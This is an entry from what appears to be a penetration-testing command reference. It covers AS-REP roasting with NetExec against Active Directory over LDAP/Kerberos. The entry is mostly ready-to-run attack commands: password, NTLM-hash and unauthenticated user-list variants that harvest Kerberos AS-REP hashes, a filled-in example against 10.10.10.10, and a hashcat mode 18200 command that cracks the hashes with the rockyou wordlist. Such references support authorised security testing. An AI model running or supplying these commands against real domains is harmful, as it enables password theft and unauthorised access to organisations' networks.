NetExec LDAP AS-REP Roasting

Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to a file ready for hashcat (-m 18200). Works without authentication if you supply '' for the password and have a valid user list.

Tool
nxc
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc ldap <dc-ip> -u <user> -p <password> --asreproast <output.txt>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc ldap <dc-ip> -u <user> -H <hash> --asreproast <output.txt>

Unauthenticated With User List requires no credentials

nxc ldap <dc-ip> -u <users.txt> -p '' --asreproast <output.txt>

Examples

nxc ldap 10.10.10.10 -u jdoe -p 'Password123!' --asreproast asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Tags

nxc netexec asreproast preauth kerberos

References